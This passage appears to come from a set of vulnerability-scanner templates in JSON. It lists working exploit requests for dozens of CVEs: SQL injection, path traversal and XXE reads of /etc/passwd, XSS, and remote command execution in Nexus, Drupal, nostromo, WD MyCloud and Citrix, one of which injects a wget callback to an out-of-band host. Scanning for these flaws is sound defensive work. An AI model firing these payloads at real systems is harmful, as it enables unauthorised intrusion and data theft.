{{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers":[{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-2579","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","POST /cs/ContentServer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value='&#39; and &#39;1&#39;=&#39;0 --","Use this utility to view and manage URLs"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["NAME='_authkey_' VALUE='([0-9A-Z]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10405","info":{"name":"Jenkins <=2.196 - Cookie Exposure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","JSESSIONID"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010287","info":{"name":"Timesheet Next Gen <=1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /timesheet/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>javascript:alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-9670","info":{"name":"Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection","severity":"critical"},"requests":[{"raw":["POST /Autodiscover/Autodiscover.xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n<Request>\n<EMailAddress>aaaaa</EMailAddress>\n<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","Problem accessing"],"condition":"and"},{"type":"status","status":[503]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-16278","info":{"name":"nostromo 1.9.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\nHost: {{Hostname}}\n\necho\necho\ncat /etc/passwd 2>&1\n"],"matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9161","info":{"name":"PrismaWEB - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/scripts/login_par.js"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["txtChkUser","txtChkPassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7653","info":{"name":"YzmCMS v3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","YzmCMS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-19287","info":{"name":"WordPress Ninja Forms <3.3.18 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?s&post_status=all&post_type=nf_sub&action=-1&form_id=1&nf_form_filter&begin_date=\"><img+src%3Dx+onerror%3Dalert%28document.domain%29%3B%2F%2F&end_date&filter_action=Filter&paged=1&action2=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Begin Date\" value=\"\\\"><img src=x onerror=alert(document.domain);//\">"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19751","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/ssl-fields/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_field_name=new&new_field_type_id=1&new_description=test&new_notes=test\n","GET /admin/ssl-fields/ 